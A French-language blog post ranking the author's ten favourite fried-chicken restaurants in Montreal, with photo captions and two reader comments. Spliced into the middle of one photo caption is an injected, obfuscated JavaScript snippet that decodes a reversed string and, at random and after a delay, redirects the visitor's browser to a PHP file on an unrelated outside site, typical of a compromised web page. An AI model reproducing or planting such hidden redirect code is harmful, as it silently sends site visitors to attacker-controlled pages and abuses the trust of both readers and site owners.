Top 10 : mes meilleurs poulets frits à Montréal

poulet_frit_chinatown

Top 10 : mes meilleurs poulets frits à Montréal

2020 fut clairement l’année du poulet frit… Du moins, à Montréal. Si plusieurs restaurants se sont « réinventés » en offrant au menu leur propre version de cet ultime mets réconfortant, on ne doit pas oublier que Montréal est depuis bien longtemps LA ville au Québec où trouver LE meilleur poulet frit. Qu’il soit de style coréen, japonais (karaage), Nashville, chinois, péruvien, malaisien, taïwanais, portugais… À fine ou épaisse panure à base de levain, panko, différents types de farines, lait de babeurre… Frit à une ou deux reprises, trempé en sauce ou non, parsemé d’un mélange d’épices ou non, épicé, à l’ail… Quand vient le temps de parler poulet frit, on peut clairement s’apercevoir que le terrain de jeu est énorme — et comprendre pourquoi tant de chefs s’y sont aventurés !

Voici quelques-uns des meilleurs restaurants à Montréal où se faire plaisir avec un bon festin de poulet frit. Notez que cette liste est totalement personnelle… Oui, j’ai des préférences et oui, je les ai tous goûtés ET approuvés. (Sauf Comon) Enfin, certains restaurants ont à mes yeux un point supplémentaire s’ils servent une salade de chou de qualité !

Avant d’entrer dans le sujet chaud (ou plutôt frit !), je vous laisse ici la liste de mes poulets rôtis préférés à Montréal.

poulet_frit_coq
Poulet frit, salade de chou, toutes les sauces. Le meilleur moyen pour en juger la qualité !
Mes 10 meilleurs poulets frits à Montréal

 

*Cette liste est d’ordre aléatoire

 

Roch le Coq

Chez Roch le Coq, j’ai particulièrement aimé la panure craquante très bien assaisonnée, ainsi que la gravy. La friture est à l’américaine (avec du babeurre), et non à l’asiatique. Les six copropriétaires ayant tous un impressionnant parcours dans le monde de la gastronomie servent fièrement un poulet du Québec (Ferme des Voltigeurs) et le déclinent en barils, en sandwichs ou en poutine. La salade de chou n’est pas si mal et plaira certainement aux amateurs de coriandre.

 

Casgrain BBQ

Si vous vous demandiez qu’est-ce que ça donne un poulet frit au levain, eh bien je peux vous confirmer que le résultat est plutôt pas mal du tout… Mais encore ? Une panure extrêmement craquante et savoureuse — l’une des meilleures que j’ai goûtée. Le poulet est bien assaisonné, mais c’est la panure qui vole la vedette. Salade de chou parlant, le chef Frappier est allé dans la direction mi-crémeuse mi-traditionnelle. Très bonne !

  • http://vinmonlapin.com
  • 150 Saint-Zotique Est *À noter que Casgrain BBQ utilise temporairement le local du Bar St-Denis au 6966 rue Saint-Denis

 

Bucky Rooster’s

Lors de ma visite, c’est le sandwich au poulet frit qui a volé la vedette. La panure était savoureuse, mais se détachait trop facilement de la chaire. Notez aussi que si vous optez pour le poulet épicé, assurez-vous d’être bien tolérant : il arrache. Enfin, je n’ai pas souvenir de la salade de chou… Désolé !

 

Mon Petit Poulet

Bien installé dans l’ancienne rôtisserie Le Coq Express depuis 2018, on peut dire que Mon Petit Poulet a su emmener le poulet rôti à un autre niveau. Bien que le poulet frit soit disponible à sa plus simple expression, mon côté nostalgique m’a fait pencher pour le fameux hot chicken (oui, je l’avoue, j’adore le hot chicken). Ce dernier est fait à partir de leur poulet saumuré et assaisonné façon abodo frit entre deux tranches de pain challah au beurre, avec grits de fromage en grains, petits pois et gravy en garniture. Gourmand à souhait, n’est-ce pas ?

 

Paradis BBQ

Je vais être honnête, les fois que j’ai mangé du Paradis BBQ, c’était davantage pour leur poulet rôti que le poulet frit. Néanmoins, je me souviens très bien que le poulet popcorn était, disons… Très addictif. Exactement comme leur purée de pommes de terre avec fromage en grains.

 

Rubie’s

Bien que Rubie’s soit un « projet COVID » par le très talentueux chef Hakim Chajar, ce poulet frit ne paye pas pour attendre à être dégusté. En plus d’être sans gluten, je peux affirmer que c’est l’un des poulets frits les plus juteux auquel j’ai fait affaire. La panure est plutôt craquante que croquante et forcément, plus fine. À ma petite déception, il n’y a pas de salade de chou au menu… Mais le mac’n’cheese au foie gras, bien qu’un peu plus costaud, est très fameux.

 

Le Coq Frit

Pendant plus d’un an, Le Coq Frit était mon poulet frit préféré à Montréal : j’en avais d’ailleurs fait mention ici. Au moment même, je peux difficilement faire le même constat, mais il reste tout le même dans mes tops. La panure est très croquante, parfaitement assaisonnée et enveloppe un poulet amplement juteux. Bonne nouvelle, l’équipe est en pleine expansion : après avoir ouvert une deuxième succursale dans le « deuxième » quartier Chinois sur Sainte-Catherine Ouest, le troisième Coq Frit verra prochainement le jour sur Saint-Laurent, dans le Mile-End.

1800 rue Sainte-Catherine Ouest

 

Comon

Confession, c’est le seul poulet frit sur la liste qu’il me tarde d’y mettre les doigts dessus. Mais, pour que la réputation de ce petit restaurant coréen verdunois envahisse Montréal en son entier, je me dis que ce n’est pas pour rien. Prime à bord, on y va pour leur fameux poulet frit (coréen), préparé exactement comme il se doit : frit à deux reprises, préalablement assaisonné d’une marinade sèche épicée, sucrée et salée. À suivre…

 

Dinette Triple Crown

Mon tout premier coup de cœur poulet frit — en fait, Dinette fut l’un des premiers endroits visités lorsque je suis arrivé à Montréal. Je me souviens comme si c’était hier : assis seul au bar, dans mon monde en train de déguster l’assiette deux morceaux avec biscuit, salade de chou (forcément) et mac’n’cheese. Pour moi, Dinette Triple Crown est la quintessence du « soul » cuisine du sud des États-Unis.

 

Mon Ami

Mon Ami est en quelque sorte mon « go-to » pour du bon poulet frit coréen. Une sorte de « no-brainer », que tout Montréalais devrait découvrir afin de se mettre au diapason avec le style coréen. Maintenant, il existe près de 10 Mon Ami sur l’ile de Montréal, Longueuil et Brossard… Je ne saurai vous dire si le produit est similaire partout, mais j’ai été satisfait de mes expériences au Mon Ami Somerled et Express Concordia.

http://www.restomonami.com

 

Enfin, un autre sur ma liste est Le Petit Vibe pour leur « fried chicken & waffles » servi avec beurre de ube et le sandwich au poulet frit épicé. À suivre également…

bucky_roosters_poulet_frit_montreal
Le fameux s<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>andwich au poulet frit de Bucky Rooster's
poulet_frit_montreal_rubies
Poulet frit sans gluten de Rubie's, par le chef Hakim Chajar
poulet_paradis_bbq
Paradis BBQ et son poulet popcorn
puree_pomme_de_terre_paradis_bbq
Non, ce n'est pas du poulet frit... Mais cette purée de PDT avec fromage en grains du Paradis BBQ est l'accompagnement parfait !
2 Comments
  • Sergio De Santis
    Posted at 16:17h, 20 juin Répondre

    Merci pour les conseils. On peut ajouter aussi l’Icehouse sur Roy.

    • Tommy Dion
      Posted at 08:36h, 21 juin Répondre

      Bonjour M. De Santis, c’est vrai, je me souviens d’y avoir goûté et il est pas mal ! Je vais devoir y retourner pour me mettre à jour.

      Merci !

Post A Comment